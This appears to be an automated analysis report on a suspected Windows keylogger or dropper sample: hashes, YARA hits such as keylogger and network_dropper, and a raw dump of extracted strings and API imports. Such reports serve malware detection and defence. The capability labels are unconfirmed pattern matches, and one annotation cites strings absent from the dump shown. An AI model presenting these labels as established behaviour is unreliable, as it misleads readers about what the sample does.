Sample details: c61e264e66bef6af55e101ef2d1a0dd9 --

Hashes
MD5: c61e264e66bef6af55e101ef2d1a0dd9
SHA1: d3298597e64f4297c81bdcc430b64a824a176722
SHA256: 1e3f36a95700dbffb0fb535e3052ef05410b61dcd035d8cbcf8026a6260c80e7
SSDEEP: 24576:TEtl9mRda1cSGB2uJ2s4otqFCJrW9FqvSbqsHasgXhFHDAGtlRXZ+CP63n0NuJvf:oEs1ht
Details
File Type: PE32
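Yara Hits
Note: these are pattern matches, not confirmed behaviour. The hits below name both Borland Delphi and Microsoft Visual C++ (MFC) toolchains, so compiler attribution from the rules alone is ambiguous. Capability rules such as keylogger, screenshot or network_dropper need confirmation from the import list or from dynamic analysis.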
YRP/Borland_Delphi_40_additional | YRP/Microsoft_Visual_Cpp_v50v60_MFC | YRP/Borland_Delphi_30_additional | YRP/Borland_Delphi_30_ | YRP/Borland_Delphi_Setup_Module | YRP/Borland_Delphi_40 | YRP/Borland_Delphi_v40_v50 | YRP/BobSoft_Mini_Delphi_BoB_BobSoft_additional | YRP/Borland_Delphi_v60_v70 | YRP/Borland_Delphi_v30 | YRP/Borland_Delphi_DLL | YRP/Borland | YRP/BobSoftMiniDelphiBoBBobSoft | YRP/IsPE32 | YRP/IsWindowsGUI | YRP/HasOverlay | YRP/HasDigitalSignature | YRP/borland_delphi | YRP/domain | YRP/url | YRP/contentis_base64 | YRP/maldoc_OLE_file_magic_number | YRP/Browsers | YRP/Dropper_Strings | YRP/anti_dbg | YRP/network_dropper | YRP/screenshot | YRP/keylogger | YRP/spreading_file | YRP/win_mutex | YRP/win_registry | YRP/win_private_profile | YRP/win_files_operation | YRP/win_hook | YRP/Big_Numbers3 | YRP/Delphi_FormShow | YRP/Delphi_CompareCall | YRP/Delphi_Copy | YRP/Delphi_StrToInt | YRP/Delphi_DecodeDate | YRP/Str_Win32_Winsock2_Library | YRP/Str_Win32_Wininet_Library | YRP/Str_Win32_Internet_API | YRP/suspicious_packer_section | YRP/CAP_HookExKeylogger |
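Strings
Note: these are raw printable-character runs extracted from the file; many of the short entries are incidental byte sequences rather than meaningful text. The API-logging format strings, the `C:\cuckoo\` path and the `cmonitor.pdb` reference further down appear to belong to an API-monitoring component rather than to the Delphi program, so confirm which embedded image the API names listed after them come from before attributing them to the sample's own code.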
		Q>)txO
YYF;nt
,v:3|6
ectw,}j
!ckUpA
etugg6!
~oyY7E
wiaW$jj
h x's4
0WWAWW
YYImv'
< tK<	tG
PDTWWWWW
x	&TUr
L9Ejyi
d=Ejy4
.=G	eZ
T1Ejyi
*CIT[N
Y:::::
Y;:8::
^SSSSS
j"^SSSSS
v	N+D$
f1|AtI
H1ChYH
%'-Ht5,
PcY^AX6O
w+vpH6
9K9n6*
F?M?0z
9:5;?;
5$rP	"z
w:0;1v
c,Y88=
<3a5	|
S_Rq{KA_NqaNW_
Lt5_Ft-_
Ae'qL2	
N!sg5|H~n
 BTD&Z
t+WWVPV
R~`ypu
PQ"o9R
kFo-QU
TdmB*,
NWFQ&_
XUwp?n
skTp1vp'
uIOKab
:SEHhk
TTxX2@
]rT$vy
tU"Qn'4
:sZav8
'fyNkj
rijndael
n6mejw
3<r<Cp]~
N:Y'LEg
MzD.9D
@Fc`0l
Lr$igYwf
'g{8M/_Z"
Sy@0[&9Y
P5YY@1
'0"b]c
Mv4`fG
JMMj1)#
y>I)}o
2pwQ)Y
sK@@u,+
)>6Sx3
*v\4gxy
k$z0C]
RPYG4T_:
WYW8}K
{4bJCk
f<Sv+h
_UE	$?
PIqzdM
UY-A{R
mpX}?;<
_/Ijmg
minvQT
[Ztt'~Dm
w#&bKY
<)m^?T
[I-.n|~
L9U"'.
iB~rgV
.Kb2)qC
9r)duW
:(CiJo
I;iwR&
O5pNhd
ADVAPI32.DLL
`h`hhh
xppwpp
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
UTF-16LE
UNICODE
Unknown Runtime Check Error
Stack memory around _alloca was corsurt
mcal`va
labl= w
s used before htEwasPin
tialized
y was corruptee
A cast to a slauher
data type has caure}$a 
oss of data.  If uhpw w
envional, you c
` mask the c
e of the cabtaw/t0 +h! (p1r#p=i&t: .i5m8s$.u 
or ex`m
g = (i
nddmi= Th:sHw
ffect the qtam9
y'oT zhd re
ptimized code.
volwe o
as not properly #fvzd
 FsGally a result oa c1|l?ns u 
n declared with oFe cQlli^g cnnrentio
$with a funstio~ pointer 
_^[YY]
S	_^[]
TPUtilWindow
TColor
EInvalidGraphicp
EInvalidGraphicOperation
TFontPitch
	fpDefault
fpVariable
fpFixed
Graphics
	TFontName
TFontCharset
TFontStyle
fsBold
fsItalic
fsUnderline
fsStrikeOut
Graphics
TFontStyles
	TPenStyle
psSolid
psDash
psDot	psDashDot
psDashDotDot
psClear
psInsideFrame
Graphics
TPenMode
pmBlack
pmWhite
pmCopy	pmNotCopy
pmMergePenNot
pmMaskPenNot
pmMergeNotPen
pmMaskNotPen
pmMerge
pmNotMerge
pmMask	pmNotMask
pmNotXor
Graphics
TBrushStyle
bsSolid
bsClear
bsHorizontal
bsVertical
bsFDiagonal
bsBDiagonal
bsCross
bsDiagCross
Graphics
TGraphicsObjectx
TGraphicsObjectP
Graphics
IChangeNotifier$
Graphics
TFontT
TFont$
Graphics
Charset
Color<
Height
Pitch<
Graphics
Style<
TBrush
TBrush
Graphics
TCanvas
TCanvasd
Graphics
Brush<
CopyModeP
TProgressStage
psStarting	psRunning
psEnding
Graphicst
TProgressEvent
Sender
TObject
TProgressStage
PercentDone
	RedrawNow
Boolean
String
TGraphic
TGraphic
Graphics
TPicture
TPicture
Graphics
TSharedImage
TMetafileImage
	TMetafile
	TMetafile
Graphics
TBitmapImage
TBitmap<
TBitmap
Graphics
TIconImage
Graphics
TResourceManager
_^[YY]
clBlack
clMaroon
clGreen
clOlive
clNavy
clPurple
clTeal
clGray
clSilver
clLime
clYellow
clBlue
clFuchsia
clAqua
clWhite
clMoneyGreen
clSkyBlue
clCream
clMedGray
clActiveBorder
clActiveCaption
clAppWorkSpace
clBackground
clBtnFace
clBtnHighlight
clBtnShadow
clBtnText
clCaptionText
clDefault
clGradientActiveCaption
clGradientInactiveCaption
clGrayText
clHighlight
clHighlightText
clHotLight
clInactiveBorder
clInactiveCaption
clInactiveCaptionText
clInfoBk
clInfoText
clMenu
clMenuBar
clMenuHighlight
clMenuText
clNone
clScrollBar
cl3DDkShadow
cl3DLight
clWindow
clWindowFrame
clWindowText
ANSI_CHARSET
DEFAULT_CHARSET
SYMBOL_CHARSET
MAC_CHARSET
SHIFTJIS_CHARSET
HANGEUL_CHARSET
JOHAB_CHARSET
GB2312_CHARSET
CHINESEBIG5_CHARSET
GREEK_CHARSET
TURKISH_CHARSET
HEBREW_CHARSET
ARABIC_CHARSET
BALTIC_CHARSET
RUSSIAN_CHARSET
THAI_CHARSET
EASTEUROPE_CHARSET
OEM_CHARSET
Default
E$PVSj
_^[YY]
C ;C$s
TFileFormat
TFileFormatsList
QQQQSV
TClipboardFormats
_^[YY]
kD$TdP
kD$PdP
D$LPkD$XdPV
D$HPkD$TdPV
|$( EMFt
TBitmapCanvas
TBitmapCanvas
Graphics
_^[YY]
s(;~ t8
C(_^[Y]
TPatternManagerSV
_^[YY]
TObjectList
TOrderedList
TStack
GetMonitorInfoA
GetSystemMetrics
MonitorFromRect
MonitorFromWindow
MonitorFromPoint
GetMonitorInfo
DISPLAY
GetMonitorInfoA
DISPLAY
GetMonitorInfoW
DISPLAY
EnumDisplayMonitors
USER32.DLL
IHelpSelector$
:	HelpIntfs
IHelpSystem$
:	HelpIntfs
ICustomHelpViewer$
:	HelpIntfs	
IExtendedHelpViewer
:	HelpIntfs
ISpecialWinHelpViewer
:	HelpIntfs
IHelpManager$
:	HelpIntfs
EHelpSystemException
THelpViewerNode
THelpManager
comctl32.dll
InitializeFlatSB
UninitializeFlatSB
FlatSB_GetScrollProp
FlatSB_SetScrollProp
FlatSB_EnableScrollBar
FlatSB_ShowScrollBar
FlatSB_GetScrollRange
FlatSB_GetScrollInfo
FlatSB_GetScrollPos
FlatSB_SetScrollPos
FlatSB_SetScrollInfo
FlatSB_SetScrollRange
TSynchroObject
TCriticalSection
uxtheme.dll
OpenThemeData
CloseThemeData
DrawThemeBackground
DrawThemeText
GetThemeBackgroundContentRect
GetThemePartSize
GetThemeTextExtent
GetThemeTextMetrics
GetThemeBackgroundRegion
HitTestThemeBackground
DrawThemeEdge
DrawThemeIcon
IsThemePartDefined
IsThemeBackgroundPartiallyTransparent
GetThemeColor
GetThemeMetric
GetThemeString
GetThemeBool
GetThemeInt
GetThemeEnumValue
GetThemePosition
GetThemeFont
GetThemeRect
GetThemeMargins
GetThemeIntList
GetThemePropertyOrigin
SetWindowTheme
GetThemeFilename
GetThemeSysColor
GetThemeSysColorBrush
GetThemeSysBool
GetThemeSysSize
GetThemeSysFont
GetThemeSysString
GetThemeSysInt
IsThemeActive
IsAppThemed
GetWindowTheme
EnableThemeDialogTexture
IsThemeDialogTextureEnabled
GetThemeAppProperties
SetThemeAppProperties
GetCurrentThemeName
GetThemeDocumentationProperty
DrawThemeParentBackground
EnableTheming
TCommonDialog
TCommonDialog
Dialogs
HelpContext
OnClose
OnShowSV
TMessageForm
TMessageForm
Dialogs
_^[YY]
%s%s%s%s%s%s%s%s%s%s
Cancel
Ignore
NoToAll
YesToAll
Message
commdlg_help
commdlg_FindReplace
WndProcPtr%.8X%.8X
TImage
TImagex
ExtCtrls
Alignd>C
Anchors
AutoSize
Center
Constraints$7C
DragCursor
DragKind8=C
DragMode
Enabled
IncrementalDisplay
ParentShowHintP
Picture
	PopupMenu
Proportional
ShowHint
Stretch
Transparent
Visible
OnClick
OnContextPopup
OnDblClick
OnDragDrop,AC
OnDragOver\BC
	OnEndDock\BC
	OnEndDrag
OnMouseDown@@C
OnMouseMove
	OnMouseUpp
OnProgress
OnStartDock
OnStartDrag
TTimer
TTimer
ExtCtrls
Enabled|
Interval
OnTimerU
Delphi Picture
Delphi Component
EIniFileException
TCustomIniFile
TIniFile
_^[YY]
ERegistryException
	TRegistryS
MAPI32.DLL
TConversion
TConversionFormat
comctl32.dll
TThemeServices
Theme manager 
 2001, 2002 Mike Lischke
 !"#$%
TTextLayout
tlCenter
tlBottom
StdCtrls
TCustomLabel
TCustomLabelx
StdCtrls
TLabel
TLabel
StdCtrls'
AligndKA
	Alignmentd>C
Anchors
AutoSize
BiDiMode
Caption
Constraints$7C
DragCursor
DragKind8=C
DragMode
Enabled
FocusControlP
ParentBiDiMode
ParentColor
ParentFont
ParentShowHint
	PopupMenu
ShowAccelChar
ShowHint
Transparent
Layout
Visible
WordWrap
OnClick
OnContextPopup
OnDblClick
OnDragDrop,AC
OnDragOver\BC
	OnEndDock\BC
	OnEndDrag
OnMouseDown@@C
OnMouseMove
	OnMouseUp
OnMouseEnter
OnMouseLeave
OnStartDock
OnStartDragP
TCustomEdit
TCustomEditP
StdCtrls
TabStop
TScrollStyle
ssNone
ssHorizontal
ssVertical
ssBoth
StdCtrls
TCustomMemo
TCustomMemo\
StdCtrls
StdCtrls8
AligndKA
	Alignmentd>C
Anchors
BevelEdges
BevelInner
	BevelKind
BevelOuter
BiDiMode<
BorderStyle
Constraints
Ctl3D$7C
DragCursor
DragKind8=C
DragMode
EnabledP
HideSelection<LC
ImeMode
ImeNamePVA
Lines<
	MaxLength
OEMConvert
ParentBiDiMode
ParentColor
ParentCtl3D
ParentFont
ParentShowHint
	PopupMenu
ReadOnly
ScrollBars
ShowHint
TabOrder
TabStop
Visible
WantReturns
WantTabs
WordWrap
OnChange
OnClick
OnContextPopup
OnDblClick
OnDragDrop,AC
OnDragOver\BC
	OnEndDock\BC
	OnEndDrag
OnEnter
OnExit
	OnKeyDown
OnKeyPress
OnKeyUp
OnMouseDown@@C
OnMouseMove
	OnMouseUp
OnStartDock
OnStartDrag
TButtonActionLink
TButtonControl
TButtonControl
StdCtrls
TButton
TButton|
StdCtrls&
Actiond>C
Anchors
BiDiMode
Cancel
Caption
Constraints
Default$7C
DragCursor
DragKind8=C
DragMode
EnabledP
ModalResult
ParentBiDiMode
ParentFont
ParentShowHint
	PopupMenu
ShowHint
TabOrder
TabStop
Visible
WordWrap
OnClick
OnContextPopup
OnDragDrop,AC
OnDragOver\BC
	OnEndDock\BC
	OnEndDrag
OnEnter
OnExit
	OnKeyDown
OnKeyPress
OnKeyUp
OnMouseDown@@C
OnMouseMove
	OnMouseUp
OnStartDock
OnStartDragL
TMemoStrings
TMemoStringsL
StdCtrls
GH+D$	
_^[YY]
_^[YY]
BUTTON
THintAction0)C
THintAction
StdActns
TWinHelpViewer
_^[YY]
_^[YY]
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
_^[YY]
MS_WINHELP
#32770
TModalResult
TCursor
TAlign
alNone
alBottom
alLeft
alRight
alClient
alCustom
Controls
TDragObject
TDragObject
Controls
TBaseDragControlObject
TBaseDragControlObject
Controls
TDragControlObject
TDragControlObjectEx
TDragDockObject
TDragDockObjecth:C
Controls
TDragDockObjectEx
TControlCanvas
TControlCanvas
Controls
TControlActionLink
TMouseButton
mbLeft
mbRight
mbMiddle
Controls<=C
	TDragMode
dmManual
dmAutomatic
Controls
TDragState
dsDragEnter
dsDragLeave
dsDragMove
Controls
	TDragKind
dkDrag
dkDock
Controls
	TTabOrder
TCaption
TAnchorKind
akLeft
akRight
akBottom
Controls
TAnchors
TConstraintSize
TSizeConstraints
TSizeConstraints
Controls
	MaxHeightx>C
MaxWidthx>C
	MinHeightx>C
MinWidth
TMouseEvent
Sender
TObject
Button
TMouseButton
TShiftState
Integer
Integer
TMouseMoveEvent
Sender
TObject
TShiftState
Integer
Integer
	TKeyEvent
Sender
TObject
TShiftState
TKeyPressEvent
Sender
TObject
TDragOverEvent
Sender
TObject
Source
TObject
Integer
Integer
TDragState
Accept
Boolean
TDragDropEvent
Sender
TObject
Source
TObject
Integer
Integer
TStartDragEvent
Sender
TObject	
DragObject
TDragObject
TEndDragEvent
Sender
TObject
Target
TObject
Integer
Integer
TDockDropEvent
Sender
TObject
Source
TDragDockObject
Integer
Integer
TDockOverEvent
Sender
TObject
Source
TDragDockObject
Integer
Integer
TDragState
Accept
Boolean
TUnDockEvent
Sender
TObject
Client
TControl
	NewTarget
TWinControl
Boolean
TStartDockEvent
Sender
TObject	
DragObject
TDragDockObject
TGetSiteInfoEvent
Sender
TObject
DockClient
TControl
InfluenceRect
MousePos
TPoint
CanDock
Boolean
TCanResizeEvent
Sender
TObject
NewWidth
Integer
	NewHeight
Integer
Resize
Boolean
TConstrainedResizeEvent
Sender
TObject
MinWidth
Integer
	MinHeight
Integer
MaxWidth
Integer
	MaxHeight
Integer
TMouseWheelEvent
Sender
TObject
TShiftState
WheelDelta
Integer
MousePos
TPoint
Handled
Boolean
TMouseWheelUpDownEvent
Sender
TObject
TShiftState
MousePos
TPoint
Handled
Boolean
TContextPopupEvent
Sender
TObject
MousePos
TPoint
Handled
Boolean
TControl
TControl
Controls	
Width<
Height$7C
Cursor
HelpType
HelpKeyword
HelpContext
TWinControlActionLink
TImeMode
	imDisable
imClose
imOpen
imDontCare
imSAlpha
imAlpha
imHira
imSKata
imKata	imChinese
imSHanguel	imHanguel
Controls
TImeName
TBorderWidth
	TBevelCut
bvNone	bvLowered
bvRaised
bvSpace
Controls
TBevelEdge
beLeft
beRight
beBottom
Controls
TBevelEdges
TBevelKind
bkNone
bkTile
bkSoft
bkFlat
Controls
IDockManager$
Controls
TWinControl
TWinControl`NC
Controls
TGraphicControl
TGraphicControl<RC
Controls
TCustomControl
TCustomControl\SC
Controls
THintWindow
THintWindow
Controls
	TDockZone
	TDockTree
TMouse
crDefault
crArrow
crCross
crIBeam
crSizeNESW
crSizeNS
crSizeNWSE
crSizeWE
crUpArrow
crHourGlass
crDrag
crNoDrop
crHSplit
crVSplit
crMultiDrag
crSQLWait
crAppStart
crHelp
crHandPoint
crSizeAll
crSize
	TSiteList
_^[YY]
S$_^[]
YZ]_^[
t%Jt?Jt[
%s (%s)
YZ]_^[
u$;~|u
tr;s@u
;CLtX3
_^[YY]
;s0t=;
IsControl
_^[YY]
_^[YY]
+WH+W@
:GauOFKu
DesignSize
_^[YY]
_^[YY]
k&9",:au
ztyjxjj
yp<m8v
tV(kvR
P*mc_}
SVc:s"
B[-M72
*UK7=v
ty{H	P
_^FP-\
7;|O'cZ
2?j0&Et
Vdc\$;
cD`)^c<
q+VJdl
CTdH+U
+)hw'}
hxI 3W
7Onmpo-2
w)HHK]t
mntA75
?kBU=r
wX3l^;
Ffh \3
v{+9vu'
m?E1$c
Q\3{ W
v C$2[(
h$tCDj
lkDU1	
u8c][f
PDuRts`
@-H7}$
tw<a1t
{K1ocx>
CrXyN0
~'tH8x>
B".%+(-OJ
aU2E{e	
QDPbM.
0}sPC^
}HXtnMe
/Dntke
0Onnte
fV,tqF43&Q,lP2@
|cIKjT
zB_^[+
Q{[Lk'$
o_^[RV
(#:"tG(
yHXN?U
^VA$cY
6!aK~0
>dcV|8
|6tRsp
O8Lv4y
TeK1isD
DxplBrer
! HeJpMe
sosoKt\W:83:
qZq8c,
q'kSp\[
RvzJx?
XY-mNS
~Nz{>ozk
<DdZYd
EUh*z<
]@7Dp|
|hNmuZFC
TScroloBarStyla
RegularcssFlat
sHotTra{
EForms
ontro0(#rollB=	
Contr3
t roS/
QardotComos=
Position<
4567?9G
.+*2h<
hHTracking
Visible
dSbb'w:
ormal#w1M
nimQz'd
sM-x+m
edYF-rms
`0olli
T+nVon
Hm,gQin
Wj6rglH*
rzS'w-l
rdezU6y
sNo>cJb
bsSizeabme
bsDialof
`sWoklRihd
ToolWin
Fnr}sK
PBarae~Swyce
ihimi}e
bhMaxkmizf
biLelp
TBorderIcons
TPosit
Design
efault
zeOnly
mCentor
ltMooit
mDes{to
	dmP`im
dMActigeF
rintXca
Propxrt
rintSoF
loseTct
caNohe
THElpEvent
Commind
Integev
|/lHelp
Boomean
Boolean
H?E`t?E
TBusthmFoqm
TCustolFor
kernel32.dll
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
GetVersion
GetCurrentThreadId
InterlockedDecrement
InterlockedIncrement
VirtualQuery
WideCharToMultiByte
MultiByteToWideChar
lstrlenA
lstrcpynA
LoadLibraryExA
GetThreadLocale
GetStartupInfoA
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLocaleInfoA
GetCommandLineA
FreeLibrary
FindFirstFileA
FindClose
ExitProcess
ExitThread
CreateThread
WriteFile
UnhandledExceptionFilter
RtlUnwind
RaiseException
GetStdHandle
user32.dll
GetKeyboardType
LoadStringA
MessageBoxA
CharNextA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
oleaut32.dll
SysFreeString
SysReAllocStringLen
SysAllocStringLen
kernel32.dll
TlsSetValue
TlsGetValue
LocalAlloc
GetModuleHandleA
advapi32.dll
RegSetValueExA
RegQueryValueExA
RegOpenKeyExA
RegFlushKey
RegCreateKeyExA
RegCloseKey
kernel32.dll
lstrcpyA
WritePrivateProfileStringA
WriteFile
WinExec
WaitForSingleObject
VirtualQuery
VirtualAlloc
UnmapViewOfFile
SizeofResource
SetThreadLocale
SetFilePointer
SetFileAttributesA
SetEvent
SetErrorMode
SetEndOfFile
ResumeThread
ResetEvent
ReadFile
MultiByteToWideChar
MulDiv
MoveFileA
MapViewOfFile
LockResource
LocalFree
LoadResource
LoadLibraryA
LeaveCriticalSection
InitializeCriticalSection
GlobalUnlock
GlobalReAlloc
GlobalHandle
GlobalLock
GlobalFree
GlobalFindAtomA
GlobalDeleteAtom
GlobalAlloc
GlobalAddAtomA
GetVersionExA
GetVersion
GetTickCount
GetThreadLocale
GetTempPathA
GetSystemInfo
GetSystemDirectoryA
GetStringTypeExA
GetStdHandle
GetShortPathNameA
GetProcAddress
GetPrivateProfileStringA
GetModuleHandleA
GetModuleFileNameA
GetLogicalDriveStringsA
GetLocaleInfoA
GetLocalTime
GetLastError
GetFullPathNameA
GetFileAttributesA
GetExitCodeThread
GetDriveTypeA
GetDiskFreeSpaceA
GetDateFormatA
GetCurrentThreadId
GetCurrentProcessId
GetCPInfo
GetACP
FreeResource
InterlockedIncrement
InterlockedExchange
InterlockedDecrement
FreeLibrary
FormatMessageA
FindResourceA
FindNextFileA
FindFirstFileA
FindClose
FileTimeToLocalFileTime
FileTimeToDosDateTime
EnumCalendarInfoA
EnterCriticalSection
DeleteFileA
DeleteCriticalSection
CreateThread
CreateFileA
CreateEventA
CopyFileA
CompareStringA
CloseHandle
version.dll
VerQueryValueA
GetFileVersionInfoSizeA
GetFileVersionInfoA
gdi32.dll
UnrealizeObject
StretchBlt
SetWindowOrgEx
SetWinMetaFileBits
SetViewportOrgEx
SetTextColor
SetStretchBltMode
SetROP2
SetPixel
SetEnhMetaFileBits
SetDIBColorTable
SetBrushOrgEx
SetBkMode
SetBkColor
SelectPalette
SelectObject
SaveDC
RestoreDC
Rectangle
RectVisible
RealizePalette
PlayEnhMetaFile
PatBlt
MoveToEx
MaskBlt
LineTo
IntersectClipRect
GetWindowOrgEx
GetWinMetaFileBits
GetTextMetricsA
GetTextExtentPointA
GetTextExtentPoint32A
GetSystemPaletteEntries
GetStockObject
GetPixel
GetPaletteEntries
GetObjectA
GetEnhMetaFilePaletteEntries
GetEnhMetaFileHeader
GetEnhMetaFileBits
GetDeviceCaps
GetDIBits
GetDIBColorTable
GetDCOrgEx
GetCurrentPositionEx
GetClipBox
GetBrushOrgEx
GetBitmapBits
ExcludeClipRect
DeleteObject
DeleteEnhMetaFile
DeleteDC
CreateSolidBrush
CreatePenIndirect
CreatePalette
CreateHalftonePalette
CreateFontIndirectA
CreateDIBitmap
CreateDIBSection
CreateCompatibleDC
CreateCompatibleBitmap
CreateBrushIndirect
CreateBitmap
CopyEnhMetaFileA
BitBlt
user32.dll
CreateWindowExA
WindowFromPoint
WinHelpA
WaitMessage
UpdateWindow
UnregisterClassA
UnhookWindowsHookEx
TranslateMessage
TranslateMDISysAccel
TrackPopupMenu
SystemParametersInfoA
ShowWindow
ShowScrollBar
ShowOwnedPopups
ShowCursor
SetWindowsHookExA
SetWindowTextA
SetWindowPos
SetWindowPlacement
SetWindowLongA
SetTimer
SetScrollRange
SetScrollPos
SetScrollInfo
SetRect
SetPropA
SetParent
SetMenuItemInfoA
SetMenu
SetForegroundWindow
SetFocus
SetCursor
SetClipboardData
SetClassLongA
SetCapture
SetActiveWindow
SendMessageA
ScrollWindow
ScreenToClient
RemovePropA
RemoveMenu
ReleaseDC
ReleaseCapture
RegisterWindowMessageA
RegisterClipboardFormatA
RegisterClassA
RedrawWindow
PtInRect
PostQuitMessage
PostMessageA
PeekMessageA
OpenClipboard
OffsetRect
OemToCharA
MsgWaitForMultipleObjects
MessageBoxA
MessageBeep
MapWindowPoints
MapVirtualKeyA
LoadStringA
LoadKeyboardLayoutA
LoadIconA
LoadCursorA
LoadBitmapA
KillTimer
IsZoomed
IsWindowVisible
IsWindowEnabled
IsWindow
IsRectEmpty
IsIconic
IsDialogMessageA
IsChild
InvalidateRect
IntersectRect
InsertMenuItemA
InsertMenuA
InflateRect
GetWindowThreadProcessId
GetWindowTextA
GetWindowRect
GetWindowPlacement
GetWindowLongA
GetWindowDC
GetTopWindow
GetSystemMetrics
GetSystemMenu
GetSysColorBrush
GetSysColor
GetSubMenu
GetScrollRange
GetScrollPos
GetScrollInfo
GetPropA
GetParent
GetWindow
GetMenuStringA
GetMenuState
GetMenuItemInfoA
GetMenuItemID
GetMenuItemCount
GetMenu
GetLastActivePopup
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
GetIconInfo
GetForegroundWindow
GetFocus
GetDesktopWindow
GetDCEx
GetCursorPos
GetCursor
GetClipboardData
GetClientRect
GetClassNameA
GetClassInfoA
GetCapture
GetActiveWindow
FrameRect
FindWindowA
FillRect
ExitWindowsEx
EqualRect
EnumWindows
EnumThreadWindows
EndPaint
EnableWindow
EnableScrollBar
EnableMenuItem
EmptyClipboard
DrawTextA
DrawMenuBar
DrawIconEx
DrawIcon
DrawFrameControl
DrawEdge
DispatchMessageA
DestroyWindow
DestroyMenu
DestroyIcon
DestroyCursor
DeleteMenu
DefWindowProcA
DefMDIChildProcA
DefFrameProcA
CreatePopupMenu
CreateMenu
CreateIcon
CloseClipboard
ClientToScreen
CheckMenuItem
CallWindowProcA
CallNextHookEx
BeginPaint
CharNextA
CharLowerBuffA
CharLowerA
CharUpperBuffA
CharToOemA
AdjustWindowRectEx
ActivateKeyboardLayout
kernel32.dll
oleaut32.dll
SafeArrayPtrOfIndex
SafeArrayGetUBound
SafeArrayGetLBound
SafeArrayCreate
VariantChangeType
VariantCopy
VariantClear
VariantInit
ole32.dll
OleUninitialize
OleInitialize
CoCreateInstance
CoUninitialize
CoInitialize
oleaut32.dll
GetErrorInfo
SysFreeString
comctl32.dll
ImageList_SetIconSize
ImageList_GetIconSize
ImageList_Write
ImageList_Read
ImageList_GetDragImage
ImageList_DragShowNolock
ImageList_SetDragCursorImage
ImageList_DragMove
ImageList_DragLeave
ImageList_DragEnter
ImageList_EndDrag
ImageList_BeginDrag
ImageList_Remove
ImageList_DrawEx
ImageList_Draw
ImageList_GetBkColor
ImageList_SetBkColor
ImageList_ReplaceIcon
ImageList_Add
ImageList_GetImageCount
ImageList_Destroy
ImageList_Create
shell32.dll
SHGetSpecialFolderLocation
SHGetPathFromIDListA
ADVAPI32.DLL
SetSecurityInfo
SetEntriesInAclA
GetSecurityInfo
333333333333333333
33333333?333333
333338
33333833
333838
3333339
3333333333333338
333333333333333333
334C33333338
33B$3333333
34""C33333833
3B""$33333
4"*""C3338
"C3338
:*"*"$3338
"*"$33
:33:"$
"C8338
"J"C3333
3333:"$
#33338
"J333333
33333:"$3333338
333333
$3333333
333333:"33333338
3333333
33333333
333333333333333333
33333333?333333
333338
33333833
333838
3333339
3333333333333338
333333333333333333
33DDDDD3333
33333333333
333333?
333333
333333
3333f3333333?
3336Dc3333338
333>fC333333
c333333
3333333333338
3333Dc3333333
3336fC3333338
333>fC333333
333>fd333333
fC33333
3333>fd333338
fC333?3
33fd3>fC333
fDFfC338
33>ffffc338
fff3333
3333333333338
4DF334DC33
333*C33
c33*C333
33338?383
F*F333383
"$c33333
"dc3333833
CjC338
CjC338
D*C33383
C33333833?33
3333333
3334JC33333338?333
C3333333
C3333333
3333fc33333338
333333333333?
33333?
333333
333333333333333333
333333333333333333
333333333333
334C33333338
33B$3333333
34""C33333833
3B""$33333
4"*""C3338
"C3338
:*3:"$3338
3333:"$3333338
"C333333
33333:"$3333338
333333
"C333333
333333:"C3333338
3333333
#3333333
3333333:3333333383
333333333333333333
333DDD33333?
2C4"""D338
2$B""""C38
2""333:"C8
2""#33:DC8
333338
333333333333333
333333DDD3
:DC33:""$8
:"C333
$334B"$3
"DDB""$3
3:"""""
333333
333333333333333333
333333333333333333
333333333333
334C33333338
33B$3333333
34""C33333833
3B""$33333
4"*""C3338
"C3338
:*3:"$3338
3333:"$3333338
"C333333
33333:"$3333338
333333
"C333333
333333:"C3333338
3333333
#3333333
3333333:3333333383
333333333333333333
33333333
HelpMe
'KillandHide
(ShlObj
System
SysInit
KWindows
UTypes
sActiveX
3Messages
CommCtrl
*ShellAPI
RegStr
?WinInet
UrlMon
FComObj
qComConst
CVariants
SysConst
$VarUtils
SysUtils
Dialogs
ExtCtrls
Consts
5Themes
nComCtrls
Printers
WWinSpool
^Classes
"RTLConsts
QTypInfo
+Graphics
FlatSB
StdActns
Clipbrd
YStrUtils
&Controls
MultiMon
vMenus
Contnrs
ImgList
EActnList
dStdCtrls
WinHelpViewer
RHelpIntfs
ComStrs
ExtActns
ExtDlgs
3CommDlg
Buttons
8Registry
IniFiles
CUxTheme
SyncObjs
RichEdit
ToolWin
ListActns
AAccCtrl
AclAPI
TlHelp32
Un_Main
TPF0	TFrm_Main
Frm_Main
AlphaBlend	
AlphaBlendValue
BorderIcons
BorderStyle
bsNone
ClientHeight
ClientWidth
	clBtnFace
Font.Charset
DEFAULT_CHARSET
Font.Color
clWindowText
Font.Height
	Font.Name
MS Sans Serif
Font.Style
OldCreateOrder
Position
poScreenCenter
OnCreate
FormCreate
PixelsPerInch
TextHeight
Height
TabOrder
TTimer
Interval
OnTimer
	tmr1Timer
VirtualAlloc
VirtualFree
kernel32.dll
ExitProcess
user32.dll
MessageBoxA
wsprintfA
LOADER ERROR
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
 (08@P`p
kernel32.dll
GetProcAddress
GetModuleHandleA
LoadLibraryA
user32.dll
advapi32.dll
oleaut32.dll
advapi32.dll
version.dll
gdi32.dll
user32.dll
oleaut32.dll
ole32.dll
oleaut32.dll
comctl32.dll
shell32.dll
advapi32.dll
GetKeyboardType
RegQueryValueExA
SysFreeString
RegSetValueExA
VerQueryValueA
UnrealizeObject
CreateWindowExA
SafeArrayPtrOfIndex
OleUninitialize
GetErrorInfo
ImageList_SetIconSize
SHGetSpecialFolderLocation
SetSecurityInfo
q|H"mxe
t~Hif D
#D|[aa
_^J2|;
i}|7|M
Tt\t.-
R#M|^uZ
f#k&+r
e]n^ip
+Gh33O
eEM	~_nNK
T`Is%Lp
833%b233G
)q$	,V
Hy733O5
U033O4
bkNf8Q
Dw433G
QwQUCg
%P433:
QwQU_g
:33O4T
49Qzki
QwQU_g
|$iO!H
@Ww@t,
 CD%e3
p&:aR2a^
